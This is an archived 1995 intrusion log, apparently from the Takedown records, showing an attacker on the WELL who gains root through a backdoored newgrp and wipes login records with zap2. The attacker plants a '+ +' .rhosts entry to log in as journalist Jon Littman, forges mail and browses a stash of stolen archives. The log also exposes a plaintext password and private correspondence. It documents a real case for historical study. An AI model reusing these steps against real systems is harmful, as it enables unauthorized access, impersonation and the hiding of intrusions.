Kevin On Demand
- Kevin is a Good Name - kevin-on-demand.takedown.com 4003
- Start: 1995 Feb 5 20:20:21
- Total Run Time: 9:50
- From teal.csn.org to well.sf.ca.us.
- Kevin tries to forge mail to Jon Littman from himself. He's found a message from Capt. Kevin Ziese, of the Air Force Information Warface Center, and altered it slightly. Is this Kevin's secret way of communicating with Jon Littman? This session was altered slightly to preserve the confidentiality of Jon Littman's mail.
UNIX(r) System V Release 4.0 (well)
This is the WELL
Type newuser to sign up.
Type trouble if you are having trouble logging in.
Type guest to learn about the WELL.
If you already have a WELL account, type your username.
login: dono
Password: fucknmc
Welcome to the WELL
You own your own words. This means that you are responsible
for the words that you post on the WELL and that reproduction of those
words without your permission in any medium outside of the WELL's
conferencing system may be challenged by you, the author.
**Default prompts on the WELL changed on Monday. If you use a program
**such as Eudora or Sweeper to login, then type extract news 1706 100
**NEW LOWER DISK STORAGE RATES EFFECTIVE FEBRUARY 1st. FOR MORE INFORMATION
**Type !extract news 867 18
You have mail.
well% newgrp -hack root
# ./zap2 dono
Zap2!
# ./zap2 dono
Zap2!
# csh
well# ./zap2 dono
Zap2!
well# !!
./zap2 dono
^C
well#
well#
well#
well# pwd
/home/d/o/dono
well# cp 143 /home/j/l/littman
well# rm 143
well# newgrp -hack jlittman
$ cd /home/j/l/jlittman
$ ls t-0la
t-0la: No such file or directory
$ ls -tla
total 1658
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw------- 1 jlittman well 391829 Feb 3 08:11 .inbox
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
drwxr-xr-x 2 jlittman well 512 Feb 2 14:05 .
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 26 Jan 4 21:46 .sh_history
-rw------- 1 jlittman well 755 Dec 20 10:48 dead.letter
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
$ mv /home/j/l/littman/143 .
mv: cannot access /home/j/l/littman/143
$ newgrp -hack root
# mv /home/j/l/littman .
# ls
dead.letter littman mbox
# /usr/etc/chown jlittman *
/usr/etc/chown: not found
# cat > .rhosts
+ +
^D
# chown jlittman .r* lit*
# ls -tla
total 1672
-rw------- 1 jlittman other 4 Feb 5 20:23 .rhosts
drwxr-xr-x 2 jlittman well 512 Feb 5 20:23 .
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw-rw-rw- 1 jlittman sys 5352 Feb 5 20:22 littman
-rw------- 1 jlittman well 391829 Feb 3 08:11 .inbox
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 26 Jan 4 21:46 .sh_history
-rw------- 1 jlittman well 755 Dec 20 10:48 dead.letter
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
# rlogin localhost -l jlittman
Last login: Fri Feb 3 08:05:58 from ts-tty7-fast
Welcome to the WELL
You own your own words. This means that you are responsible
for the words that you post on the WELL and that reproduction of those
words without your permission in any medium outside of the WELL's
conferencing system may be challenged by you, the author.
**Default prompts on the WELL changed on Monday. If you use a program
**such as Eudora or Sweeper to login, then type extract news 1706 100
**NEW LOWER DISK STORAGE RATES EFFECTIVE FEBRUARY 1st. FOR MORE INFORMATION
**Type !extract news 867 18
You have mail.
PicoSpan. WELL version W2.0c (01/31/95).
Copyright (c) 1984 (version T3.2), NETI.
Upcoming WELL Events: (type noevents to turn this message off)
Feb 17 WELL Office Party #101 (g news ; s 1714)
_ __________ __
| | / / ____/ / / / NEW USERS: Please read topics 1 and 2 for
| | /| / / __/ / / / / important info about this conference. Type
| |/ |/ / /___/ /___/ /___ s 1 2 and press [Return] at the OK prompt.
|__/|__/_____/_____/_____/
Question and Answers Topic: see 180
_________ ____ ___ ___ Introduce Yourself: see 181
/ ___/ __ \/ __ `__ \/ _ \ WELL Office Party see 183
/ /__/ /_/ / / / / / / __/
\___/\____/_/ /_/ /_/\___/ Type r at Respond prompt to enter a
response.
... to the WELLcome
conference! For help from a real person: type: helpers
WELLcome conference menu: type: wellcome
To contact WELL Customer support, mail support or call us (voice) at
415-332-4335 (6am-10pm Pacific Time Mon-Fri, 12pm-8pm Sat-Sun).
10 newresponse topics and 18 brandnew topics
First topic 1, last 193
You have mail.
OK (? for help): ^CInterrupt!
OK (? for help): ls
dead.letter littman mbox
OK (? for help): mail jlittman
Subject: here you go :-) A vision from God
~>littman
~
~r littman
<j
~r> a
^C
(Interrupt -- one more to kill letter)
^C
OK (? for help): rm dead*
"rm" is not a valid command at this prompt. Type help for help.
OK (? for help): ls -tla
total 1672
-rw------- 1 jlittman well 34 Feb 5 20:24 dead.letter
-rw------- 1 jlittman other 4 Feb 5 20:23 .rhosts
drwxr-xr-x 2 jlittman well 512 Feb 5 20:23 .
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw-rw-rw- 1 jlittman sys 5352 Feb 5 20:22 littman
-rw------- 1 jlittman well 391829 Feb 3 08:11 .inbox
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 26 Jan 4 21:46 .sh_history
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
OK (? for help): sh
Use ^D to exit
$ rm dead*
$ rm .rhosts
$ mail^C
$ cat littman | mail jlittman
$ tail .inbox
=========================================================
Capt Kevin J. Ziese ziese@chaos.csap.af.mil
Chief, Countermeasures Development 1-210-377-0477 Voice
AF Information Warfare Center 1-210-377-1326 Fax
1100 NW Loop 410, Suite 607 1-800-217-0570 Pager
San Antonio, Texas 78213
=========================================================
$ rm littman
$ tail -100 jlittman
tail: cannot open input
$ tail -100 .inbox
Return-Path: jlittman
Received: (from jlittman@localhost) by well.sf.ca.us (8.6.9/8.6.9) id UAA11263 f
or jlittman; Sun, 5 Feb 1995 20:25:24 -0800
Date: Sun, 5 Feb 1995 20:25:24 -0800
From: Jon Littman <jlittman>
Message-Id: <199502060425.UAA11263@well.sf.ca.us>
To: jlittman
>Of interest also was that the tools were subsequently posted at an .edu
>site and then taken off the net by their administrators.
Tsutomu and I discussed this attack in depth, over dinner, and he never
mentioned his tools being posted somewhere; I think what may have happened is
confusing definitions -- tools like "gimme which is the ankle-biters weapon of
choice' vs tools like 'the interface builder builder, which I defy anyone to
execute outside Tsutomu's lab having seen it in operation firsthand. It's
sweet, but it's just not going to be a compressed tar file you download and
uncompress, it requires a great deal of careful planning and preprocessing
before use. And my comments are based on sitting with Tsutomu last summer and
having him show me how the 'advanced' tools work.
>
>This incident is just the tip of the iceberg. I'm fear that we all may get
>spooled off in a router discussion eddy and miss the importance of what the
>other tools were and what they do.
>
>How's that for another catalyst?
>
>
Tsutomu Shimomura and I were on the system vulnerabilities session of the
conference referenced in the article -- and it was his system that was
attacked. We discussed, privately, the attack at length. The 'tools' that
were stolen are far less significant than might be expected for three reasons:
(1) this attack, in an even more elementary form, was launched, successfully,
on his system last summer and most of the tools were originally pilfered then
-- not now. (2) the tools, were more snippets of code that require the
original code architect to string them together and compile and execute. (3)
the crackers don't necessarily need sophisticated tools, and will be loath to
use pilfered, and very complicated (i.e. easily attributed) ones if they're
intelligent, because if caught intruding it will also be evidence they broke
into a research system in San Diego. I would like to discuss another thread
of all this though.
AF testing has verified that 50% of the systems on the net, within the .af.mil
domain, are vulnerable to penetration with the simplest techniques. On 80% of
those 50% my team can get root use equally simple techniques. Although the IP
spoofing is interesting let's work the math, because our metric data indicates
that 95% of what's reported is ankle-biting not roicket science. There's no
denying that IP spoofing is severe and it could hurt a lot of us and it should
be fixed, unfortunately so should world hunger -- the problem is you can't fix
everything, nor can you fix a lot of things at once -- you have to prioritize
based on what is happening, not what might happen. For instance, if
experience data indicates that sendmail is still wide open on most systems,
even if you prevent IP spoofing sendmail is still vulnerable. This is
important because yopu'll have stopped one IP spoofer, but 95 others crackers
will have snatched the code you built using sendmail. It's a hollow argument
to say sendmail should be updated because as 8lgm will demonstrate at midnight
on 6 Feb -- the newest version of sendmail is still vulnerable. We need to
identify the tope ten problems, and proactively prevent them. I know,
metrically, what the Air Force's top ten are and we are working on the short
erm solution. Until that's fixed, I'm willing to bite the bullet and accept
what I cannot change -- for the moment.
Were am I going? First, the tools taken from Tsutomu will most likely not be
seen for a while because unlike the gimme program, there were code snippets
not functional shell scripts AND they can be easily attributed to him. Two,
ip spoofing is bad, but the ankle biters are worse because our systems (yours
and mine) are vulnerable to the most elementary attacks and as long as that
stands, the exotic ones should be counted but not obsessed over.
Finally, I wonder if the people on this list would share metric data? Since
things like number of attacks, number of successes, and number of compromises
(along with things like the top ten attacks you've seen) would not hold a site
up to the microscope and would not compromise site data -- but it would let us
identify the top ten, real world, problems. If we could achieve even a modest
goal like this, we could confidently say "these are the immediate
countermeasures that must be built." I am willing to share AF metric data at
this level to help strengthen the community as a whole. I'm also willing to
accept and maintain this data in something like an email server were yopu
email your new input and the list gets emailed the new metrics. Any thoughts
on this?
I'd like to thank Frank for being a catalyst. Often times I'm reluctant to
post anything because I like to listen to everyone else's thoughts first. It
just seemed like everyone was thinking the same thing I was so I decided to
'share' ;)
Kevin
**** Hey john, Kevin is a good name :-)
=========================================================
Capt Kevin J. Ziese ziese@chaos.csap.af.mil
Chief, Countermeasures Development 1-210-377-0477 Voice
AF Information Warfare Center 1-210-377-1326 Fax
1100 NW Loop 410, Suite 607 1-800-217-0570 Pager
San Antonio, Texas 78213
=========================================================
$ ^D
You have more mail.
OK (? for help): ^D
You're now leaving the WELLcome conference.
compiling data...
jlittman, your current disk usage and charges are:
Current disk usage: 835 Kbytes
Estimated charge for today's disk use: $ 0.17
Disk charges incurred since start of Feb: $ 0.83
User: jlittman, charges added to your bill this session are:
Usage: 3 minutes at $2.00 an hour, $ 0.10
Total: $ 0.10
Note: These totals do NOT include International Surcharges,
nor credits for your first 5 hours on The WELL. For more
information, call The WELL @ (415) 332-4335, or type
!billing at almost any prompt.
Thanks :-)
Connection closed.
# zap2 jlittman
zap2: not found
# cd
# ./zap2 jlittman
Zap2!
# cd /home/j/l/jlittman
# ls -tla
total 1672
-rw------- 1 jlittman well 142 Feb 5 20:25 .sh_history
drwxr-xr-x 2 jlittman well 512 Feb 5 20:25 .
-rw------- 1 jlittman well 397497 Feb 5 20:25 .inbox
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
# rm .sh*
# tail -50 .inbox
everything, nor can you fix a lot of things at once -- you have to prioritize
based on what is happening, not what might happen. For instance, if
experience data indicates that sendmail is still wide open on most systems,
even if you prevent IP spoofing sendmail is still vulnerable. This is
important because yopu'll have stopped one IP spoofer, but 95 others crackers
will have snatched the code you built using sendmail. It's a hollow argument
to say sendmail should be updated because as 8lgm will demonstrate at midnight
on 6 Feb -- the newest version of sendmail is still vulnerable. We need to
identify the tope ten problems, and proactively prevent them. I know,
metrically, what the Air Force's top ten are and we are working on the short
term solution. Until that's fixed, I'm willing to bite the bullet and accept
what I cannot change -- for the moment.
Were am I going? First, the tools taken from Tsutomu will most likely not be
seen for a while because unlike the gimme program, there were code snippets
not functional shell scripts AND they can be easily attributed to him. Two,
ip spoofing is bad, but the ankle biters are worse because our systems (yours
and mine) are vulnerable to the most elementary attacks and as long as that
stands, the exotic ones should be counted but not obsessed over.
Finally, I wonder if the people on this list would share metric data? Since
things like number of attacks, number of successes, and number of compromises
(along with things like the top ten attacks you've seen) would not hold a site
up to the microscope and would not compromise site data -- but it would let us
identify the top ten, real world, problems. If we could achieve even a modest
goal like this, we could confidently say "these are the immediate
countermeasures that must be built." I am willing to share AF metric data at
this level to help strengthen the community as a whole. I'm also willing to
accept and maintain this data in something like an email server were yopu
email your new input and the list gets emailed the new metrics. Any thoughts
on this?
I'd like to thank Frank for being a catalyst. Often times I'm reluctant to
post anything because I like to listen to everyone else's thoughts first. It
just seemed like everyone was thinking the same thing I was so I decided to
'share' ;)
Kevin
**** Hey john, Kevin is a good name :-)
=========================================================
Capt Kevin J. Ziese ziese@chaos.csap.af.mil
Chief, Countermeasures Development 1-210-377-0477 Voice
AF Information Warfare Center 1-210-377-1326 Fax
1100 NW Loop 410, Suite 607 1-800-217-0570 Pager
San Antonio, Texas 78213
=========================================================
# last jlittman
working...
jlittman pts/43 ts-tty7-fast Feb 3 08:05:58 - Feb 3 08:11:52 (00:05)
jlittman pts/43 ts-tty21-fast Feb 2 20:56:16 - Feb 2 22:31:20 (01:35)
jlittman pts/3 ts-tty32-fast Feb 2 16:29:35 - Feb 2 16:32:51 (00:03)
jlittman pts/60 ts-tty10-fast Feb 2 13:55:54 - Feb 2 14:05:29 (00:09)
# pwd
/home/j/l/jlittman
# cd /home/j/l/jlittman
# ls -tla
total 1670
drwxr-xr-x 2 jlittman well 512 Feb 5 20:27 .
-rw------- 1 jlittman well 397497 Feb 5 20:25 .inbox
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
# cd /home/f/a/fairdemo
# ls -tla
total 199160
-rw-r--r-- 1 fairdemo well 297223 Jan 31 19:41 zipstuff.tar.Z
drwxr-xr-x 9 fairdemo well 1536 Jan 31 19:41 .
-rw-r--r-- 1 fairdemo well 10402 Jan 31 19:41 tcpd.tar.gz.crypt
-rw-r--r-- 1 fairdemo well 260032 Jan 31 19:41 sendmail.tar.Z
-rw-r--r-- 1 fairdemo well 139047 Jan 31 19:41 tcpd.tar.Z
-rw-r--r-- 1 fairdemo well 1506579 Jan 31 19:41 pw-backup.23.tar.Z
-rw-r--r-- 1 fairdemo well 257615 Jan 31 19:41 oldnw.tar.Z
-rw-r--r-- 1 fairdemo well 184864 Jan 31 19:41 oldctek.tar.Z
-rw-r--r-- 1 fairdemo well 6813202 Jan 31 19:41 o.tar.Z
-rw-r--r-- 1 fairdemo well 8142621 Jan 31 19:41 nw.tar.Z
-rw-r--r-- 1 fairdemo well 341563 Jan 31 19:41 nfs.tar.gz
-rw-r--r-- 1 fairdemo well 11185 Jan 31 19:41 vsr.gz.crypt
-rw-r--r-- 1 fairdemo well 440996 Jan 31 19:41 marty.tar.gz.crypt
-rw-r--r-- 1 fairdemo well 1085700 Jan 31 19:41 sgstuff.gz
-rw-r--r-- 1 fairdemo well 4910 Jan 31 19:41 sniffer.c.gz
-rw-r--r-- 1 fairdemo well 1495040 Jan 31 19:41 mail.tar
-rw-r--r-- 1 fairdemo well 0 Jan 31 19:41 out.gz
-rw-r--r-- 1 fairdemo well 10247 Jan 31 19:41 ifj.c.gz.crypt
-rw-r--r-- 1 fairdemo well 5947301 Jan 31 19:41 kocher.tar.Z
-rw-r--r-- 1 fairdemo well 2251792 Jan 31 19:41 foo.gz
-rw-r--r-- 1 fairdemo well 370808 Jan 31 19:41 cards.gz
-rw-r--r-- 1 fairdemo well 187350 Jan 31 19:41 eye.tar.gz
-rw-r--r-- 1 fairdemo well 2255535 Jan 31 19:41 0108.gz
-rw-r--r-- 1 fairdemo well 50942 Jan 31 19:41 btraq.tar.gz
-rw-r--r-- 1 fairdemo well 2021961 Jan 31 19:41 c68ka.tar.Z
-rw-r--r-- 1 fairdemo well 1579270 Jan 31 19:41 c68hx.tar.Z
-rw-r--r-- 1 fairdemo well 1685847 Jan 31 19:41 c68hs.tar.Z
-rw-r--r-- 1 fairdemo well 1685488 Jan 31 19:41 c68ha.tar.Z
-rw-r--r-- 1 fairdemo well 1016017 Jan 31 19:41 a68hx.tar.Z
-rw-r--r-- 1 fairdemo well 205725 Jan 31 19:41 1022csn.tar.Z
-rw-r--r-- 1 fairdemo well 48786 Jan 31 19:40 zipcrypt.zip
-rw-r--r-- 1 fairdemo well 50599 Jan 31 19:40 key2.zip
-rw-r--r-- 1 fairdemo well 136912 Jan 31 19:40 zipcrack.zip
-rw-r--r-- 1 fairdemo well 61120407 Jan 28 15:46 irix53.taz
drwxr-sr-x 32 root sys 1024 Dec 13 11:24 ..
-rw------- 1 fairdemo well 4543 Nov 8 16:05 .inbox
-rw------- 1 fairdemo well 3845 Nov 4 13:28 .pine-debug1
-rw------- 1 fairdemo well 7784 Nov 4 13:28 .pinerc
drw-r--r-- 2 fairdemo well 512 Oct 30 08:39 mail
drwxr-xr-x 4 fairdemo well 512 Oct 30 08:39 .tin
drwxr--r-- 2 fairdemo well 512 Oct 30 08:39 .nn
drwx--x--x 2 fairdemo well 512 Oct 30 08:39 .cfdir
drw-r--r-- 2 fairdemo well 512 Oct 30 04:39 News
drwx------ 2 fairdemo well 512 Oct 30 04:39 .elm
drw-r--r-- 2 fairdemo well 512 Oct 30 04:39 Mail
-rw-r--r-- 1 fairdemo well 0 Oct 28 17:34 .news_time
-rw------- 1 fairdemo well 20 Oct 19 20:22 .sh_history
-rw------- 1 fairdemo well 67 Oct 14 11:13 .profile
-rw------- 1 fairdemo well 0 Oct 14 11:12 .noidle
-rw-r--r-- 1 fairdemo well 193 Oct 12 18:49 .plan
-rw------- 1 fairdemo well 30 Oct 12 18:23 .addressbook
-rw------- 1 fairdemo well 145 Jul 7 1994 .newsrc
-rw------- 1 fairdemo well 97 Jul 7 1994 .oldnewsrc
-rw-r--r-- 1 fairdemo well 25 Jul 7 1994 .profile.old
-rw-r--r-- 1 fairdemo well 62 Jul 7 1994 .newsrc.old
-rw------- 1 fairdemo well 0 Apr 5 1994 .inbox.pop
-rw-r--r-- 1 fairdemo well 60 Mar 28 1994 .downrc
-rw------- 1 fairdemo well 3 Mar 28 1994 .uprc
-rw------- 1 fairdemo well 39 Mar 28 1994 .cflist
-rw-r--r-- 1 fairdemo well 3 Mar 23 1994 .welltour
-rw-r--r-- 1 fairdemo well 9 Jan 21 1994 .mailrc
-rw-r--r-- 1 fairdemo well 0 Nov 14 1993 .gopherrc
-rw-r--r-- 1 fairdemo well 50 Nov 14 1993 .newsrc.bak
-rw-r--r-- 1 fairdemo well 3 Nov 14 1993 .rnprofile
# ls
0108.gz c68ka.tar.Z mail.tar sendmail.tar.Z
1022csn.tar.Z cards.gz marty.tar.gz.crypt sgstuff.gz
Mail eye.tar.gz nfs.tar.gz sniffer.c.gz
News foo.gz nw.tar.Z tcpd.tar.Z
a68hx.tar.Z ifj.c.gz.crypt o.tar.Z tcpd.tar.gz.crypt
btraq.tar.gz irix53.taz oldctek.tar.Z vsr.gz.crypt
c68ha.tar.Z key2.zip oldnw.tar.Z zipcrack.zip
c68hs.tar.Z kocher.tar.Z out.gz zipcrypt.zip
c68hx.tar.Z mail pw-backup.23.tar.Z zipstuff.tar.Z
# ^D
well# ^D
well% ^D